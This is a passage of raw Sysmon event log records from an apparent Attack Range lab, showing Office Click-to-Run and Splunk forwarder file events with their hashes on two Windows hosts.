Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\tmpod.dllMD5=7C60FBF4321B8016F0893ABFAEF11EAB,SHA256=28DDEB8BB981F9741DFB9F0448167D239E0C7E98C30D902B030062AB677A4423,IMPHASH=0E76970054AF6928928A8AE6F29CE0A0truetrue 23542300x800000000000000070349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextConversionModule.dllMD5=A4880852055A4B436357FA2BB62090D3,SHA256=C960960D87651944FD8350833B0BCB545AA19BBC784BEE6952286F7E29F2C8AA,IMPHASH=0AA2666B082F89A718BF34460CECF9DEtruetrue 23542300x800000000000000070348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TellMeRuntime.dllMD5=CDA8F48AD5523C737013200D4133582F,SHA256=FD45ADF644F3CEE45BDF6A311D1F5F374595B2DB746056DD4CFCAFA05FBA80CF,IMPHASH=EA653A26DE6B81ECF880C0E5347C42D9truetrue 23542300x800000000000000070347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TecProxy.dllMD5=0305CF327E4E81854E7E51624897A0F8,SHA256=F1982296E4B40CDF124F2FD6045D074742678BC2018CEB8F5490F391D27A9442,IMPHASH=C0D7B520F2A3DD181DA804F12FBDFFD1truetrue 23542300x800000000000000070346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Tec.dllMD5=4C340C959372553C4C3714815E13A172,SHA256=E7B06655A3896C12DDD32FC09F98F9C6370862AA0DA95AFDBF002001A3EF7A7E,IMPHASH=3FA13FBE5F49DB42B889C83194389961truetrue 23542300x800000000000000070345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\System.Windows.Controls.Theming.Toolkit.zipMD5=B23995F0EBBD2EA8936CD30C3D33AF90,SHA256=219A6D055AAD7744C34E7305045FFB72406C47D39E5EEB761AEA60611DF3B3E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\STSLIST.DLLMD5=E0000058D9170ED050B4B19342B9B2EA,SHA256=C9B6F35E25BE1B59B03324F0F15116228CCCF99278A94C51EAD5917E2FE37832,IMPHASH=23F69FEF9305E86D7915D8E142A0BE8Btruetrue 23542300x800000000000000070343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ssscreenvvs.dllMD5=0F44277B72570233BF5C03A99E071E18,SHA256=55A93AEC5FB3EFE7DAD77F7FD6904EF1365EB4B8889BB7A19E961F4C02ACCC17,IMPHASH=4EBE90DA525CB5B291096318D5B44866truetrue 23542300x800000000000000070342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SOCIALPROVIDER.DLLMD5=C1D4C9428660142765E54917982DFB1F,SHA256=B7E9D472D69B6670DE79F2352247EB2E4801D625E50B813BEBA7726465DAD930,IMPHASH=BB44C08D87744C1E84ACA49B79917BDBtruetrue 23542300x800000000000000070341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SOCIALCONNECTOR.DLLMD5=87EA6CEBFF49A7A50094A3B7A5E51CD7,SHA256=0021B11D22E9EB27AA80E8968D9F695B7DFCDD4DC2A2DC59CACF2936A4058E9A,IMPHASH=24D164A85AFF6660ED1087F269D4BFCFtruetrue 23542300x800000000000000070340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SOA.DLLMD5=174E3698FB687311F68CCB7BAE19CD44,SHA256=1424A92603252AE017A24E1B86DEEF1CDB7A35B278943F9399E0256EF68DAFC0,IMPHASH=724BA97D6380EDB55A8B789788782C9Ctruetrue 23542300x800000000000000070339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SignalRClient.dllMD5=842BF6E2600D284B25E9E59B5453C788,SHA256=6E8DE33548E89FD5FBA9A7D782F69BCDA3F4EA6E8A0431CE1E799469D2ACBAFF,IMPHASH=4CC7FA95EE3DEEF88BFAD67E730ED705truetrue 23542300x800000000000000070338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SHAREPOINTPROVIDER.DLLMD5=1C005C1899266955991FDC5AD0BEB462,SHA256=45BA62438E5970C16F11B17DC2F26583F0B21F7D4A2E450CD5B8C778B57E4B27,IMPHASH=97B5610C5AA46F84BB8EAE6B0A50D496truetrue 23542300x800000000000000070337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SETLANG.EXEMD5=E0CEF60CFAC90FA5A3BF3932D36F26D8,SHA256=8C6293798D43FF38AB81807B07F4A807604E391637C3C58D6CE0036669078D76,IMPHASH=68CCA8A9C31FA4C5698476C04DFAF735truetrue 23542300x800000000000000070336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SEQCHK10.DLLMD5=6609C94C9FDF769662B889B6B1CE4D8B,SHA256=AB21F3BCA5A4957F462DA37717069ED1CFC288D923C9B4698166697C74DE2EF1,IMPHASH=EF97316FFA87A0955AA2523B1D0AD9B9truetrue 23542300x800000000000000070335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SENDTO.DLLMD5=60FFC97BDE613CB43C2CD547E64373E0,SHA256=F02DC2BC31A0ABD6137A138446B7AEF70E1D737CA9CBF1E572C9E1875AC98C48,IMPHASH=E743ADC9A25C5067A5C646D4ABB64983truetrue 23542300x800000000000000070334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SELFCERT.EXEMD5=967C67E30050CE95634319844D011A4A,SHA256=753423BA1F1CF696937B4A271E057BFB479AC02AC68BEC9AC5B8DA1CF1E0927A,IMPHASH=75C8459DA769113C842D988D8E114F3Btruetrue 23542300x800000000000000070333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SDXHelperBgt.exeMD5=B66E011B854A2D48AC78DD3742CBC791,SHA256=80957C3906B17220B828FCDF1A4D8A915FF6F3C2D7CEEC052BE4F720995EC762,IMPHASH=61B897760D66A43CF616BC658A4197F3truetrue 23542300x800000000000000070332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxhelper.exe.manifestMD5=41FAF8DE58F0F9651666C5EFD9B1F8D9,SHA256=3EBB8E0BB4D0675E58292D3899BDFE2D025EF20E1D998C1521940B8E29FC5920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SDXHelper.exeMD5=FF428A3CE5807A567C5BB8F3D3B30142,SHA256=E96A2A8192B23ABF2DCBAE0FB94781ACB52E25FE5A49E4B2C7624CFDC6F8B868,IMPHASH=077DA253C29B3BF7F62B028E4EDF069Ftruetrue 23542300x800000000000000070330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxbgt.dllMD5=C6414FFD39C87AC9B07EDA4E236BD7C8,SHA256=9404FBE1509D1230A6B3C08D45F15347F120B5381F95FE3294993EBF10A5C41C,IMPHASH=8F10CD681576569299F77411280587CEtruetrue 23542300x800000000000000070329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SCNPST64C.DLLMD5=D594D680CC14653D3E247B58B5DB9C11,SHA256=B82E2B995B82BA9C14A54050F62FAAC3E04E4D8D5234C2F32C98CC900F8C2F70,IMPHASH=59F9F32A49CB4E8E18F6FCA209C8DF82truetrue 23542300x800000000000000070328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SCNPST64.DLLMD5=EC7EA061EC295CD4904F9184D87DCA79,SHA256=40BE06C717C4069C39A46E6966C0A9FF38CA01651B0AEA4A905C9FAB06198505,IMPHASH=DD6E7ABD0F9C2FE6884CB6F145992A9Ftruetrue 23542300x800000000000000070327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SCNPST32.DLLMD5=723735FC213C5D1C2853752CE3C6D79A,SHA256=82810ED5E517B8C87B81BCDE888446A41EEE45A4F7A3D6B3ADC25338B7BF50E2,IMPHASH=9987D61970AA6DC15B31B1EBF623E620truetrue 23542300x800000000000000070326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\scdec.dllMD5=0EB9AEA5A20A51AC042BAB0D125AA5AD,SHA256=D2737224B6A45817FB0B391B2A218B1F3AA3F609ACC528BEE159C2FA04D09E9D,IMPHASH=0B6822EB4BB8C3BB7BCFF2EA7EA6CAC2truetrue 23542300x800000000000000070325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SCANPST.EXEMD5=7C2F7F219A43A249CBD020D0CABB22F7,SHA256=EBD47B0EB5ABED1AB0EB45E97093D165FB173913E7DFA9C71593A0F5C7F0E949,IMPHASH=6D25F71BF98239802E0991D11A093663truetrue 23542300x800000000000000070324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SAEXT.DLLMD5=83EF30A81A3C211188B5A90495F153D8,SHA256=F39D8F2ED256FC7083265A74DE1B74CC74297226BAEAD5CF0239CAFAF87A6BCB,IMPHASH=2F879899B6E183CFEB2AB7C921D90546truetrue 23542300x800000000000000070323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\rtmvc1decmft.dllMD5=C27BD4C7854060EE225EC3FCE8757CC7,SHA256=7E6D5691EDDBC9C2470B93FB8C2612A02D1F177610517B1300210864D5FC4F86,IMPHASH=9787EBC09FF17DF2125A7F89511E388Ctruetrue 23542300x800000000000000070322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\RTMPLTFM.dllMD5=6CC6075708E1FFDA53B67D48C3D30F33,SHA256=F9A81FDE7CAD2753075C60C3EEEF7C28E2CF37BF7A85C3CB8077C50F07F06667,IMPHASH=4F1F5757D91088593472321FA6162B0Etruetrue 23542300x800000000000000070321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmpal.dllMD5=A7D068FBE546E689800ED66513753AE6,SHA256=26B254F6A15FE0A0CA58FD004AA65F1B6DD670DD00E7CAB23BA89D42E317A748,IMPHASH=BDFEBD198EBA8673372198AAA8E71DCAtruetrue 23542300x800000000000000070320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmmvrsplitter.dllMD5=D5804C19BBBD1094A5CF8C11A6A350D7,SHA256=974497F78C290E75038F6FD30901A65DE589BCA009C3169C49E54B5AC24611D7,IMPHASH=83AE66EAC50D695D3B231A3973BCAFDFtruetrue 23542300x800000000000000070319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\rtmmvrhw.dllMD5=29C31CB8D4BC03E6FBA89F78932F20A0,SHA256=2D35AB64069CCCF65D75290C3CF923E689EDE6C3E95CF06A4929A54C3EDE41C1,IMPHASH=D632843235A6A0AB1893D673D16B318Atruetrue 23542300x800000000000000070318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\rtmmvrcs.dllMD5=9B5DE90AD64E29FEFE9583EEBA04741C,SHA256=53275E70D6C5B121D7D08A0CD5B782D4A46116879B72A2C811C0FD181F134984,IMPHASH=009A826D7FEFB78CF2A5239EF2BE7FEDtruetrue 23542300x800000000000000070317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmmvras.dllMD5=3EFBC4015F4331F938256C3B2BBF5B5B,SHA256=0D3EEA5D69A50383603D6F6ACAC018A41D5AA66F1C856FCB4AF1E3D377C1F5F8,IMPHASH=A565AFB6B6B395634EA6900D719772A1truetrue 23542300x800000000000000070316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmmediamanager.dllMD5=7B355870F6662F59D5FC03C7503FE400,SHA256=8322C2892E1A7CE9A047F6DDD3FB812F90D16E3EE8369A6FC32FEEE9AE404B49,IMPHASH=3DA6D478D056812E298111A6FC5D46F3truetrue 23542300x800000000000000070315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmcodecs.dllMD5=B47D49CF9E969C1CFA75F4889C8FA08C,SHA256=99BFB4D97759CE027F7E0C25F3CECDB7298CF55A18654056F435004288ABC84A,IMPHASH=7675F9185CC1B9959591399BEAFCD9DBtruetrue 23542300x800000000000000070314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\RTC.DLLMD5=7F0B120E1CD513290481B0C55F6E9E77,SHA256=C2D6C4C0848F77DCD9AC4B69FE878146AB8BEBF8FF68B05810DA655F07CE0687,IMPHASH=48DBA6254462A5968BBC4DD45680D73Ctruetrue 23542300x800000000000000070313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\RSWOP.ICMMD5=56FF7DD019EDAFCFAFAAE00E1FEAA245,SHA256=48D1CFDCCF06DABFECF0C2B535EACD8A5F49560F0182691CDD713B6389A30510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\roottools.dllMD5=8301AC2CEA9A821B52B3044843F56804,SHA256=7C4392A0A9ECA6400F092C358831D492442DFD5DB472E31A4AEC51EA24A7A79A,IMPHASH=71709DEE72111E556B3034DC99F56AD2truetrue 23542300x800000000000000070311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Resources.priMD5=F4DFA5024FFCE8B666FE85F4D1AAF646,SHA256=31EC93F60CE144E101FE417831F25653E3CC481382CD07F88AA90B22E7B9F408,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\REMINDER.WAVMD5=049A11EBF7EB573C59665BFDBC475DB7,SHA256=DDD77F14AA2B47C364C516FE5FC965377CEEC208B868FAFCF1CFFFC254B29A51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\REFEDIT.DLLMD5=C2949DD61A2A3A505B9213F4062C49E5,SHA256=3B47C1B065278DAF241145F77623C9FF55B1220E975A0DA5B0795DB648E4CE48,IMPHASH=CCBB1399C574D3FA2CEB4DD30B1FC9FDtruetrue 23542300x800000000000000070308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\RECALL.DLLMD5=31BCA37B34873A20C6E2C5FFD423F219,SHA256=DF3183DBB925739425D6DD50679869D385A61FF80F94D11F7A193A87F72BDB90,IMPHASH=D3B82B72D22FDC1232DEEA7E5DAA8266truetrue 23542300x800000000000000070307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\react-native-win32.dllMD5=78C2BA2842F00F4F81D0E07C7615FB8A,SHA256=A35BF7A6F46E8CAE687E18DF99E4C4CF0FC67094E36E2FAD738B211265D56868,IMPHASH=9D6B1EF4C20F19EC859107B351F590B5truetrue 23542300x800000000000000049787Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:36.241{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4171BE36876D0F618F57C3037E26DD26,SHA256=B79F09DCEBFD3DFE883F28CFDD6F283195D46AE3A1B38EED09ACCAF9F5CA40C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049786Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 